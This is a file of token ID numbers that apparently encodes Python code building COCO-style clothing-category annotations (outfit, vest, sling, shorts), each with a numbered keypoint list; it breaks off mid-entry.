32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
513,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
19509,
62,
82,
7197,
1079,
62,
448,
13927,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
604,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
6511,
62,
82,
7197,
1079,
62,
448,
13927,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
642,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
4223,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
718,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
82,
1359,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
705,
1795,
3256,
705,
6659,
3256,
705,
6469,
3256,
705,
5999,
3256,
705,
5705,
3256,
705,
5332,
3256,
705,
4521,
3256,
705,
5774,
3256,
705,
3459,
3256,
705,
4531,
3256,
705,
3829,
3256,
705,
6420,
3256,
705,
5892,
3256,
705,
6052,
3256,
705,
5824,
3256,
705,
3865,
3256,
705,
4846,
3256,
705,
5607,
3256,
705,
4089,
3256,
705,
2079,
3256,
705,
3064,
3256,
705,
8784,
3256,
705,
15377,
3256,
705,
15197,
3256,
705,
13464,
3256,
705,
13348,
3256,
705,
15801,
3256,
705,
15982,
3256,
705,
15711,
3256,
705,
14454,
3256,
705,
11442,
3256,
705,
16243,
3256,
705,
14686,
3256,
705,
16616,
3256,
705,
16562,
3256,
705,
15363,
3256,
705,
18298,
3256,
705,
17657,
3256,
705,
16817,
3256,
705,
16315,
3256,
705,
10232,
3256,
705,
19244,
3256,
705,
18376,
3256,
705,
10163,
3256,
705,
17464,
3256,
705,
11623,
3256,
705,
19420,
3256,
705,
16799,
3256,
705,
12762,
3256,
705,
18741,
3256,
705,
12952,
3256,
705,
22042,
3256,
705,
19924,
3256,
705,
16945,
3256,
705,
19880,
3256,
705,
17059,
3256,
705,
20809,
3256,
705,
19708,
3256,
705,
20107,
3256,
705,
20219,
3256,
705,
15187,
3256,
705,
23756,
3256,
705,
23726,
3256,
705,
21139,
3256,
705,
18444,
3256,
705,
18781,
3256,
705,
20964,
3256,
705,
20198,
3256,
705,
18294,
3256,
705,
19442,
3256,
705,
8628,
3256,
705,
24309,
3256,
705,
17827,
3256,
705,
21395,
3256,
705,
21526,
3256,
705,
18742,
3256,
705,
21599,
3256,
705,
18458,
3256,
705,
21273,
3256,
705,
19707,
3256,
705,
14198,
3256,
705,
25948,
3256,
705,
25061,
3256,
705,
24136,
3256,
705,
23237,
3256,
705,
20986,
3256,
705,
23055,
3256,
705,
21940,
3256,
705,
14656,
3256,
705,
22172,
3256,
705,
17279,
3256,
705,
27192,
3256,
705,
23628,
3256,
705,
25399,
3256,
705,
22985,
3256,
705,
17430,
3256,
705,
24096,
3256,
705,
22413,
3256,
705,
23188,
3256,
705,
21738,
3256,
705,
15259,
3256,
705,
27057,
3256,
705,
24294,
3256,
705,
24839,
3256,
705,
22883,
3256,
705,
21652,
3256,
705,
25096,
3256,
705,
23451,
3256,
705,
20356,
3256,
705,
23362,
3256,
705,
19782,
3256,
705,
26492,
3256,
705,
17477,
3256,
705,
24943,
3256,
705,
22913,
3256,
705,
22186,
3256,
705,
25272,
3256,
705,
24991,
3256,
705,
22337,
3256,
705,
19104,
3256,
705,
2167,
3256,
705,
1264,
3256,
705,
19004,
3256,
705,
22416,
3256,
705,
18638,
3256,
705,
21261,
3256,
705,
22136,
3256,
705,
22745,
3256,
705,
21315,
3256,
705,
22567,
3256,
705,
21536,
3256,
705,
21895,
3256,
705,
21777,
3256,
705,
26427,
3256,
705,
22291,
3256,
705,
23349,
3256,
705,
20666,
3256,
705,
24591,
3256,
705,
28727,
3256,
705,
28896,
3256,
705,
17572,
3256,
705,
26115,
3256,
705,
23148,
3256,
705,
22047,
3256,
705,
24137,
3256,
705,
18182,
3256,
705,
24909,
3256,
705,
24403,
3256,
705,
23815,
3256,
705,
23539,
3256,
705,
19214,
3256,
705,
25667,
3256,
705,
24339,
3256,
705,
25429,
3256,
705,
24409,
3256,
705,
22370,
3256,
705,
24940,
3256,
705,
24693,
3256,
705,
23721,
3256,
705,
23516,
3256,
705,
16102,
3256,
705,
28872,
3256,
705,
27877,
3256,
705,
26660,
3256,
705,
25707,
3256,
705,
22995,
3256,
705,
26912,
3256,
705,
23753,
3256,
705,
23045,
3256,
705,
21626,
3256,
705,
9031,
3256,
705,
28072,
3256,
705,
22800,
3256,
705,
28592,
3256,
705,
24970,
3256,
705,
13381,
3256,
705,
11645,
3256,
705,
28676,
3256,
705,
25600,
3256,
705,
25191,
3256,
705,
21719,
3256,
705,
30057,
3256,
705,
29119,
3256,
705,
29558,
3256,
705,
18897,
3256,
705,
22980,
3256,
705,
25540,
3256,
705,
25674,
3256,
705,
25022,
3256,
705,
26276,
3256,
705,
20233,
3256,
705,
28977,
3256,
705,
29807,
3256,
705,
27367,
3256,
705,
28857,
3256,
705,
23195,
3256,
705,
27988,
3256,
705,
27019,
3256,
705,
25870,
3256,
705,
26050,
3256,
705,
21033,
3256,
705,
30368,
3256,
705,
32568,
3256,
705,
30290,
3256,
705,
30336,
3256,
705,
26279,
3256,
705,
27033,
3256,
705,
27800,
3256,
705,
25270,
3256,
705,
27693,
3256,
705,
24369,
3256,
705,
33551,
3256,
705,
32759,
3256,
705,
31675,
3256,
705,
27696,
6,
4357,
198,
220,
220,
220,
705,
82,
38800,
10354,
17635,
198,
30072,
198,
19608,
292,
316,
17816,
66,
26129,
6,
4083,
33295,
15090,
198,
220,
220,
220,
705,
312,
10354,
767,
11,
198,
220,
220,
220,
705,
3672,
10354,
366,
1477,
2096,
1600,
198,
220,
220,
220,
705,
16668,
22872,
10354,
366,
565,
31690,
1600,
198,
220,
220,
220,
705,
2539,
13033,
10354,
37250,
16,
3256,
705,
17,
3256,
705,
18,
3256,
705,
19,
3256,
705,
20,
3256,
705,
21,
3256,
705,
22,
3256,
705,
23,
3256,
705,
24,
3256,
705,
940,
3256,
705,
1157,
3256,
705,
1065,
3256,
705,
1485,
3256,
705,
1415,
3256,
705,
1314,
3256,
705,
1433,
3256,
705,
1558,
3256,
705,
1507,
3256,
705,
1129,
3256,
705,
1238,
3256,
705,
2481,
3256,
705,
1828,
3256,
705,
1954,
3256,
705,
1731,
3256,
705,
1495,
3256,
705,
2075,
3256,
705,
1983,
3256,
705,
2078,
3256,
705,
1959,
3256,
705,
1270,
3256,
705,
3132,
3256,
705,
2624,
3256,
705,
2091,
3256,
705,
2682,
3256,
705,
2327,
3256,
705,
2623,
3256,
705,
2718,
3256,
705,
2548,
3256,
705,
2670,
3256,
705,
1821,
3256,
705,
3901,
3256,
705,
3682,
3256,
705,
3559,
3256,
705,
2598,
3256,
705,
2231,
3256,
705,
3510,
3256,
705,
2857,
3256,
705,
2780,
3256,
705,
2920,
3256,
705,
1120,
3256,
705,
4349,
3256,
705,
4309,
3256,
705,
4310,
3256,
705,
4051,
3256,
705,
2816,
3256,
705,
3980,
3256,
705,
3553,
3256,
705,
3365,
3256,
705,
3270,
3256,
705,
1899,
3256,
705,
5333,
3256,
705,
5237,
3256,
705,
5066,
3256,
705,
2414,
3256,
705,
2996,
3256,
705,
2791,
3256,
705,
3134,
3256,
705,
3104,
3256,
705,
3388,
3256,
705,
2154,
3256,
705,
4869,
3256,
705,
4761,
3256,
705,
4790,
3256,
705,
4524,
3256,
705,
2425,
3256,
705,
4304,
3256,
705,
3324,
3256,
705,
3695,
3256,
705,
3720,
3256,
